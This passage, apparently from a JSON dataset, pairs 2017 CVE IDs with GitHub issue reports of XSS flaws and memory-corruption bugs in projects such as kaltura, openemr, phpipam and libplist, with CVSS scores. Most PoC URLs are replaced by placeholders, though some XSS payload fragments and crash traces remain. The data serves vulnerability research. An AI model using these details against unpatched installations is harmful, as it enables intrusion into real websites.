  12878. "description": "Kaltura/server (lastest version) Cross Site Scripting (XSS). Produce\uff1akaltura/server Download: URLTAG Vunlerable Version: lastest version Tested Version: lastest version Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered a Cross Site Scripting (XSS) in \u201ckaltura/server\u201d, which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in APITAG HTTP GET parameter passed to PATHTAG url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation examples below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
  12879. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  12880. "severity": "MEDIUM",
  12881. "baseScore": 6.1,
  12882. "impactScore": 2.7,
  12883. "exploitabilityScore": 2.8
  12884. },
  12885. {
  12886. "CVE_ID": "CVE-2017-6392",
  12887. "Issue_Url_old": "https://github.com/kaltura/server/issues/5303",
  12888. "Issue_Url_new": "https://github.com/kaltura/server/issues/5303",
  12889. "Repo_new": "kaltura/server",
  12890. "Issue_Created_At": "2017-02-27T16:06:15Z",
  12891. "description": "kaltura/server (lastest version) Cross Site Scripting (XSS) in APITAG Product\uff1akaltura/server Download: URLTAG Vunlerable Version: lastest version Tested Version: lastest version Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered a Cross Site Scripting (XSS) in \u201ckaltura/server\u201d, which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in APITAG HTTP GET parameter passed to PATHTAG url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
  12892. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  12893. "severity": "MEDIUM",
  12894. "baseScore": 6.1,
  12895. "impactScore": 2.7,
  12896. "exploitabilityScore": 2.8
  12897. },
  12898. {
  12899. "CVE_ID": "CVE-2017-6393",
  12900. "Issue_Url_old": "https://github.com/NagVis/nagvis/issues/91",
  12901. "Issue_Url_new": "https://github.com/nagvis/nagvis/issues/91",
  12902. "Repo_new": "nagvis/nagvis",
  12903. "Issue_Created_At": "2017-02-27T17:17:01Z",
  12904. "description": "APITAG (lastest version) Cross Site Scripting (XSS). APITAG Download: URLTAG Vunlerable Version: lastest version probably prior Tested Version: lastest version Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered a Cross Site Scripting (XSS) in \u201cWPO Foundation/webpagetest\u201d, which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in \u201cobject_id\u201d HTTP GET parameter passed to PATHTAG url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
  12905. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  12906. "severity": "MEDIUM",
  12907. "baseScore": 6.1,
  12908. "impactScore": 2.7,
  12909. "exploitabilityScore": 2.8
  12910. },
  12911. {
  12912. "CVE_ID": "CVE-2017-6394",
  12913. "Issue_Url_old": "https://github.com/openemr/openemr/issues/498",
  12914. "Issue_Url_new": "https://github.com/openemr/openemr/issues/498",
  12915. "Repo_new": "openemr/openemr",
  12916. "Issue_Created_At": "2017-02-27T17:30:54Z",
  12917. "description": "APITAG (lastest version) Multiple Cross Site Scripting (XSS). APITAG Download: URLTAG Vunlerable Version: lastest version probably prior Tested Version: lastest version Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered a Cross Site Scripting (XSS) in APITAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in multiple HTTP GET parameters passed to PATHTAG url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc NUMBERTAG URLTAG NUMBERTAG URLTAG",
  12918. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  12919. "severity": "MEDIUM",
  12920. "baseScore": 6.1,
  12921. "impactScore": 2.7,
  12922. "exploitabilityScore": 2.8
  12923. },
  12924. {
  12925. "CVE_ID": "CVE-2017-6395",
  12926. "Issue_Url_old": "https://github.com/jacobwb/hashover-next/issues/152",
  12927. "Issue_Url_new": "https://github.com/jacobwb/hashover-next/issues/152",
  12928. "Repo_new": "jacobwb/hashover-next",
  12929. "Issue_Created_At": "2017-02-27T15:41:28Z",
  12930. "description": "APITAG NUMBERTAG Cross Site Scripting (XSS). APITAG Download: URLTAG Vunlerable Version NUMBERTAG and and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered a Cross Site Scripting (XSS) in APITAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in \u201chashover script\u201d HTTP GET parameter passed to PATHTAG url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG APITAG",
  12931. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  12932. "severity": "MEDIUM",
  12933. "baseScore": 6.1,
  12934. "impactScore": 2.7,
  12935. "exploitabilityScore": 2.8
  12936. },
  12937. {
  12938. "CVE_ID": "CVE-2017-6396",
  12939. "Issue_Url_old": "https://github.com/WPO-Foundation/webpagetest/issues/820",
  12940. "Issue_Url_new": "https://github.com/wpo-foundation/webpagetest/issues/820",
  12941. "Repo_new": "wpo-foundation/webpagetest",
  12942. "Issue_Created_At": "2017-02-27T14:46:24Z",
  12943. "description": "WPO Foundation/webpagetest (lastest version) Cross Site Scripting (XSS). Product\uff1aWPO Foundation/webpagetest Download: URLTAG Vunlerable Version: lastest version Tested Version: lastest version Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered a Cross Site Scripting (XSS) in \u201cWPO Foundation/webpagetest\u201d, which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in \u201cpssid\u201d HTTP GET parameter passed to PATHTAG url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
  12944. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  12945. "severity": "MEDIUM",
  12946. "baseScore": 6.1,
  12947. "impactScore": 2.7,
  12948. "exploitabilityScore": 2.8
  12949. },
  12950. {
  12951. "CVE_ID": "CVE-2017-6415",
  12952. "Issue_Url_old": "https://github.com/radare/radare2/issues/6872",
  12953. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/6872",
  12954. "Repo_new": "radareorg/radare2",
  12955. "Issue_Created_At": "2017-03-01T09:49:29Z",
  12956. "description": "Null pointer dereference in APITAG Null pointer dereference in APITAG Tested on Git HEAD: APITAG Payload ( PATHTAG ) in URLTAG To reproduce: APITAG ERRORTAG",
  12957. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  12958. "severity": "MEDIUM",
  12959. "baseScore": 5.5,
  12960. "impactScore": 3.6,
  12961. "exploitabilityScore": 1.8
  12962. },
  12963. {
  12964. "CVE_ID": "CVE-2017-6429",
  12965. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/278",
  12966. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/278",
  12967. "Repo_new": "appneta/tcpreplay",
  12968. "Issue_Created_At": "2017-02-08T16:16:29Z",
  12969. "description": "tcpcapinfo buffer overflow vulnerablily. From Aromal Raj via APITAG Hi, This mail is to report a Buffer Overflow Vulnerability which i found in 'tcpcapinfo' utility which comes with latest Tcpreplay NUMBERTAG ersion. This happens when tcpcapinfo process a specially crafted pcap file. APITAG to reproduce: raras APITAG tcpcapinfo APITAG \u200b Expected Output: Invalid file should not be parsed. Actual Output: Buffer Overflow APITAG following files attached: APITAG Which is the crafted pcap file gdb.log GDB output valgrind.log Valgrind output Can \u200bthis have a patch upstream? Thanks & Regards, Aromal Raj",
  12970. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  12971. "severity": "HIGH",
  12972. "baseScore": 7.8,
  12973. "impactScore": 5.9,
  12974. "exploitabilityScore": 1.8
  12975. },
  12976. {
  12977. "CVE_ID": "CVE-2017-6430",
  12978. "Issue_Url_old": "https://github.com/Ettercap/ettercap/issues/782",
  12979. "Issue_Url_new": "https://github.com/ettercap/ettercap/issues/782",
  12980. "Repo_new": "ettercap/ettercap",
  12981. "Issue_Created_At": "2017-02-07T19:26:29Z",
  12982. "description": "Etterfilter: Invalid read on crafted file APITAG Fault).. Etterfilter results in an invalid read of NUMBERTAG bytes when parsing a crafted file. As seen in valgrind output the issue occurs in the compile_tree function of the ef_compiler.c source file. Steps to reproduce (run on current master ettercap branch): raras APITAG etterfilter crashfile Expected output (possibly): File should not be parsed and error message should be printed stating invalid file. Actual output: Segmentation Fault POC crash file is also attached: FILETAG Valgrind output is as follows: APITAG valgrind etterfilter PATHTAG NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: etterfilter PATHTAG NUMBERTAG etterfilter NUMBERTAG copyright NUMBERTAG Ettercap Development Team NUMBERTAG protocol tables loaded: DECODED DATA udp tcp esp gre icmp ip NUMBERTAG ip arp wifi fddi tr eth NUMBERTAG constants loaded: VRRP OSPF GRE UDP TCP ESP ICMP6 ICMP PPTP PPPOE IP6 IP ARP Parsing source file PATHTAG done. BUG at PATHTAG tree_root == NULL NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG E4D7B9: clean_exit (in PATHTAG NUMBERTAG by NUMBERTAG B0: compile_tree (in PATHTAG NUMBERTAG by NUMBERTAG ERRORTAG NUMBERTAG D3: write_output (in PATHTAG NUMBERTAG by NUMBERTAG BD: main (in PATHTAG NUMBERTAG Address NUMBERTAG bc NUMBERTAG is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2CC NUMBERTAG calloc (in PATHTAG NUMBERTAG by NUMBERTAG ERRORTAG NUMBERTAG A2: globals_alloc (in PATHTAG NUMBERTAG by NUMBERTAG AF: main (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG E4D7BD: clean_exit (in PATHTAG NUMBERTAG by NUMBERTAG B0: compile_tree (in PATHTAG NUMBERTAG by NUMBERTAG ERRORTAG NUMBERTAG D3: write_output (in PATHTAG NUMBERTAG by NUMBERTAG BD: main (in PATHTAG NUMBERTAG Address NUMBERTAG is not stack'd, malloc'd or (recently) free'd NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address NUMBERTAG at NUMBERTAG E4D7BD: clean_exit (in PATHTAG NUMBERTAG by NUMBERTAG B0: compile_tree (in PATHTAG NUMBERTAG by NUMBERTAG ERRORTAG NUMBERTAG D3: write_output (in PATHTAG NUMBERTAG by NUMBERTAG BD: main (in PATHTAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Segmentation fault Thanks, Raj",
  12983. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  12984. "severity": "MEDIUM",
  12985. "baseScore": 5.5,
  12986. "impactScore": 3.6,
  12987. "exploitabilityScore": 1.8
  12988. },
  12989. {
  12990. "CVE_ID": "CVE-2017-6435",
  12991. "Issue_Url_old": "https://github.com/libimobiledevice/libplist/issues/93",
  12992. "Issue_Url_new": "https://github.com/libimobiledevice/libplist/issues/93",
  12993. "Repo_new": "libimobiledevice/libplist",
  12994. "Issue_Created_At": "2017-02-07T06:56:22Z",
  12995. "description": "memory corruption bug. Hi, I found a memory corruption bug. the stack trace is as shown below NUMBERTAG WARNING: APITAG failed to allocate NUMBERTAG fff NUMBERTAG bytes APITAG NUMBERTAG ERROR: APITAG memcpy param overlap: memory ranges FILETAG",
  12996. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H",
  12997. "severity": "MEDIUM",
  12998. "baseScore": 5.0,
  12999. "impactScore": 3.6,
  13000. "exploitabilityScore": 1.3
  13001. },
  13002. {
  13003. "CVE_ID": "CVE-2017-6436",
  13004. "Issue_Url_old": "https://github.com/libimobiledevice/libplist/issues/94",
  13005. "Issue_Url_new": "https://github.com/libimobiledevice/libplist/issues/94",
  13006. "Repo_new": "libimobiledevice/libplist",
  13007. "Issue_Created_At": "2017-02-08T03:48:41Z",
  13008. "description": "Memory allocation error. ERROR: APITAG failed to allocate NUMBERTAG a NUMBERTAG bytes of APITAG Cannot allocate memory NUMBERTAG b NUMBERTAG ec4b2 ( PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG dc ( PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG ed ( PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b ( PATHTAG NUMBERTAG b7c in parse_string_node PATHTAG NUMBERTAG b7c in parse_bin_node PATHTAG NUMBERTAG b7c in parse_bin_node_at_index PATHTAG NUMBERTAG a0 in parse_dict_node PATHTAG NUMBERTAG a0 in parse_bin_node PATHTAG NUMBERTAG a0 in parse_bin_node_at_index PATHTAG NUMBERTAG b NUMBERTAG in plist_from_bin PATHTAG NUMBERTAG a NUMBERTAG in main PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG aef5 in _start ( PATHTAG ) poc: FILETAG",
  13009. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H",
  13010. "severity": "MEDIUM",
  13011. "baseScore": 5.0,
  13012. "impactScore": 3.6,
  13013. "exploitabilityScore": 1.3
  13014. },
  13015. {
  13016. "CVE_ID": "CVE-2017-6437",
  13017. "Issue_Url_old": "https://github.com/libimobiledevice/libplist/issues/100",
  13018. "Issue_Url_new": "https://github.com/libimobiledevice/libplist/issues/100",
  13019. "Repo_new": "libimobiledevice/libplist",
  13020. "Issue_Created_At": "2017-02-24T08:36:42Z",
  13021. "description": "heap buffer overflow in base NUMBERTAG encode NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b5e NUMBERTAG at pc NUMBERTAG e bp NUMBERTAG bf NUMBERTAG fda8 sp NUMBERTAG bf NUMBERTAG fd9c READ of size NUMBERTAG at NUMBERTAG b5e NUMBERTAG thread T NUMBERTAG d in base NUMBERTAG encode PATHTAG NUMBERTAG in node_to_xml PATHTAG NUMBERTAG f in plist_to_xml PATHTAG NUMBERTAG a NUMBERTAG in main PATHTAG NUMBERTAG b5f NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG af NUMBERTAG in _start ( PATHTAG NUMBERTAG b5e NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region FILETAG",
  13022. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H",
  13023. "severity": "MEDIUM",
  13024. "baseScore": 5.0,
  13025. "impactScore": 3.6,
  13026. "exploitabilityScore": 1.3
  13027. },
  13028. {
  13029. "CVE_ID": "CVE-2017-6438",
  13030. "Issue_Url_old": "https://github.com/libimobiledevice/libplist/issues/98",
  13031. "Issue_Url_new": "https://github.com/libimobiledevice/libplist/issues/98",
  13032. "Repo_new": "libimobiledevice/libplist",
  13033. "Issue_Created_At": "2017-02-24T08:24:43Z",
  13034. "description": "heap buffer overflow in parse_unicode_node NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b5e NUMBERTAG at pc NUMBERTAG bp NUMBERTAG bf8e7e NUMBERTAG sp NUMBERTAG bf8e7e6c WRITE of size NUMBERTAG at NUMBERTAG b5e NUMBERTAG thread T NUMBERTAG in parse_unicode_node PATHTAG NUMBERTAG in parse_bin_node PATHTAG NUMBERTAG in parse_bin_node_at_index PATHTAG NUMBERTAG in parse_dict_node PATHTAG NUMBERTAG in parse_bin_node PATHTAG NUMBERTAG in parse_bin_node_at_index PATHTAG NUMBERTAG in plist_from_bin PATHTAG NUMBERTAG a NUMBERTAG in main PATHTAG NUMBERTAG b5f NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG af NUMBERTAG in _start ( PATHTAG NUMBERTAG b5e NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region FILETAG",
  13035. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
  13036. "severity": "HIGH",
  13037. "baseScore": 7.3,
  13038. "impactScore": 5.9,
  13039. "exploitabilityScore": 1.3
  13040. },
  13041. {
  13042. "CVE_ID": "CVE-2017-6439",
  13043. "Issue_Url_old": "https://github.com/libimobiledevice/libplist/issues/95",
  13044. "Issue_Url_new": "https://github.com/libimobiledevice/libplist/issues/95",
  13045. "Repo_new": "libimobiledevice/libplist",
  13046. "Issue_Created_At": "2017-02-08T05:08:19Z",
  13047. "description": "heap buffer overflow in parse_string_node NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b5e NUMBERTAG e at pc NUMBERTAG b bp NUMBERTAG bfabe NUMBERTAG sp NUMBERTAG bfabdffc WRITE of size NUMBERTAG at NUMBERTAG b5e NUMBERTAG e thread T NUMBERTAG a in parse_string_node PATHTAG NUMBERTAG a in parse_bin_node PATHTAG NUMBERTAG a in parse_bin_node_at_index PATHTAG NUMBERTAG a0 in parse_dict_node PATHTAG NUMBERTAG a0 in parse_bin_node PATHTAG NUMBERTAG a0 in parse_bin_node_at_index PATHTAG NUMBERTAG b NUMBERTAG in plist_from_bin PATHTAG NUMBERTAG a NUMBERTAG in main PATHTAG NUMBERTAG b5f9ba NUMBERTAG PATHTAG NUMBERTAG aef5 in _start ( PATHTAG NUMBERTAG b5e NUMBERTAG e is located NUMBERTAG bytes to the left of NUMBERTAG byte region FILETAG",
  13048. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H",
  13049. "severity": "MEDIUM",
  13050. "baseScore": 5.0,
  13051. "impactScore": 3.6,
  13052. "exploitabilityScore": 1.3
  13053. },
  13054. {
  13055. "CVE_ID": "CVE-2017-6440",
  13056. "Issue_Url_old": "https://github.com/libimobiledevice/libplist/issues/99",
  13057. "Issue_Url_new": "https://github.com/libimobiledevice/libplist/issues/99",
  13058. "Repo_new": "libimobiledevice/libplist",
  13059. "Issue_Created_At": "2017-02-24T08:32:19Z",
  13060. "description": "Memory allocation error NUMBERTAG ERROR: APITAG failed to allocate NUMBERTAG eff NUMBERTAG bytes of APITAG Cannot allocate memory NUMBERTAG Process memory map follows NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG ffff NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b5a NUMBERTAG b5b NUMBERTAG b5c NUMBERTAG b5d NUMBERTAG b5e NUMBERTAG b5f NUMBERTAG b5f8a NUMBERTAG b5f9b NUMBERTAG b5f9b NUMBERTAG b5fb NUMBERTAG PATHTAG NUMBERTAG b5fb NUMBERTAG b5fb NUMBERTAG PATHTAG NUMBERTAG b5fb NUMBERTAG b5fbb NUMBERTAG PATHTAG NUMBERTAG b5fbb NUMBERTAG b5fbc NUMBERTAG PATHTAG NUMBERTAG b5fbc NUMBERTAG b5fbd NUMBERTAG PATHTAG NUMBERTAG b5fbd NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG e NUMBERTAG b NUMBERTAG e NUMBERTAG b NUMBERTAG FILETAG NUMBERTAG a3 in parse_bin_node PATHTAG NUMBERTAG a3 in parse_bin_node_at_index PATHTAG NUMBERTAG in parse_dict_node PATHTAG NUMBERTAG in parse_bin_node PATHTAG NUMBERTAG in parse_bin_node_at_index PATHTAG NUMBERTAG in plist_from_bin PATHTAG NUMBERTAG a NUMBERTAG in main PATHTAG NUMBERTAG b5fd6a NUMBERTAG PATHTAG NUMBERTAG af NUMBERTAG in _start ( PATHTAG ) FILETAG",
  13061. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H",
  13062. "severity": "MEDIUM",
  13063. "baseScore": 5.0,
  13064. "impactScore": 3.6,
  13065. "exploitabilityScore": 1.3
  13066. },
  13067. {
  13068. "CVE_ID": "CVE-2017-6448",
  13069. "Issue_Url_old": "https://github.com/radare/radare2/issues/6885",
  13070. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/6885",
  13071. "Repo_new": "radareorg/radare2",
  13072. "Issue_Created_At": "2017-03-02T16:47:42Z",
  13073. "description": "Stack buffer overflow in APITAG Stack buffer overflow in APITAG Tested on Git HEAD NUMBERTAG e NUMBERTAG Payload ( PATHTAG ) in URLTAG To reproduce: APITAG ASAN: ERRORTAG More context in Valgrind report (I can overwrite return address! please consider using stack canaries, because are disabled by default). ERRORTAG",
  13074. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  13075. "severity": "HIGH",
  13076. "baseScore": 7.8,
  13077. "impactScore": 5.9,
  13078. "exploitabilityScore": 1.8
  13079. },
  13080. {
  13081. "CVE_ID": "CVE-2017-6478",
  13082. "Issue_Url_old": "https://github.com/paintballrefjosh/MaNGOSWebV4/issues/15",
  13083. "Issue_Url_new": "https://github.com/paintballrefjosh/mangoswebv4/issues/15",
  13084. "Repo_new": "paintballrefjosh/mangoswebv4",
  13085. "Issue_Created_At": "2017-03-04T05:01:11Z",
  13086. "description": "I have find a Reflected XSS vulnerability in this project. Hello: I have find a Reflected XSS vulnerability in this project. The vulnerability exists due to insufficient filtration of user supplied data in \"step\" HTTP parameter that will be passed to PATHTAG The infected source code is line NUMBERTAG there is no protection on $_GET FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG APITAG < The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ) FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
  13087. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13088. "severity": "MEDIUM",
  13089. "baseScore": 6.1,
  13090. "impactScore": 2.7,
  13091. "exploitabilityScore": 2.8
  13092. },
  13093. {
  13094. "CVE_ID": "CVE-2017-6479",
  13095. "Issue_Url_old": "https://github.com/FenixHosting/fenix-open-source/issues/2",
  13096. "Issue_Url_new": "https://github.com/fenixhosting/fenix-open-source/issues/2",
  13097. "Repo_new": "FenixHosting/fenix-open-source",
  13098. "Issue_Created_At": "2017-03-04T14:42:05Z",
  13099. "description": "I have find a Reflected XSS vulnerability in this project. Hello: I have find a Reflected XSS vulnerability in this project. The vulnerability exists due to insufficient filtration of user supplied data in \"search by topic\" HTTP parameter that will be passed to PATHTAG The infected source code is line NUMBERTAG there is no protection on $_GET FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
  13100. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13101. "severity": "MEDIUM",
  13102. "baseScore": 6.1,
  13103. "impactScore": 2.7,
  13104. "exploitabilityScore": 2.8
  13105. },
  13106. {
  13107. "CVE_ID": "CVE-2017-6480",
  13108. "Issue_Url_old": "https://github.com/groovel/cmsgroovel/issues/2",
  13109. "Issue_Url_new": "https://github.com/groovel/cmsgroovel/issues/2",
  13110. "Repo_new": "groovel/cmsgroovel",
  13111. "Issue_Created_At": "2017-03-04T05:34:46Z",
  13112. "description": "I have find a Reflected XSS vulnerability in this project. Hello: I have find a Reflected XSS vulnerability in this project. The vulnerability exists due to insufficient filtration of user supplied data in \u201cpath\u201d HTTP parameter that will be passed to PATHTAG The infected source code is line NUMBERTAG there is no protection on $_REQUEST FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
  13113. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13114. "severity": "MEDIUM",
  13115. "baseScore": 6.1,
  13116. "impactScore": 2.7,
  13117. "exploitabilityScore": 2.8
  13118. },
  13119. {
  13120. "CVE_ID": "CVE-2017-6481",
  13121. "Issue_Url_old": "https://github.com/phpipam/phpipam/issues/992",
  13122. "Issue_Url_new": "https://github.com/phpipam/phpipam/issues/992",
  13123. "Repo_new": "phpipam/phpipam",
  13124. "Issue_Created_At": "2017-02-27T18:04:54Z",
  13125. "description": "phpipam (lastest version) Multiple Cross Site Scripting (XSS). Product\uff1aphpipam Download: URLTAG Vunlerable Version: lastest version and probably prior Tested Version: lastest version Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered multiple Cross Site Scripting (XSS) in \u201cphpipam\u201d, which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in multiple HTTP POST parameters passed to several pages. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc NUMBERTAG Post : instructions = > APITAG alert NUMBERTAG APITAG APITAG APITAG alert NUMBERTAG APITAG < To FILETAG",
  13126. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13127. "severity": "MEDIUM",
  13128. "baseScore": 6.1,
  13129. "impactScore": 2.7,
  13130. "exploitabilityScore": 2.8
  13131. },
  13132. {
  13133. "CVE_ID": "CVE-2017-6483",
  13134. "Issue_Url_old": "https://github.com/atutor/ATutor/issues/129",
  13135. "Issue_Url_new": "https://github.com/atutor/atutor/issues/129",
  13136. "Repo_new": "atutor/atutor",
  13137. "Issue_Created_At": "2017-03-02T17:15:46Z",
  13138. "description": "APITAG \u2013 Multiple Cross Site Scripting (XSS). Product: APITAG Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered APITAG NUMBERTAG which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in the \u201clang_code\u201d HTTP GET parameter passed to PATHTAG PATHTAG and PATHTAG An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc NUMBERTAG URLTAG NUMBERTAG URLTAG NUMBERTAG URLTAG",
  13139. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13140. "severity": "MEDIUM",
  13141. "baseScore": 6.1,
  13142. "impactScore": 2.7,
  13143. "exploitabilityScore": 2.8
  13144. },
  13145. {
  13146. "CVE_ID": "CVE-2017-6484",
  13147. "Issue_Url_old": "https://github.com/INTER-Mediator/INTER-Mediator/issues/772",
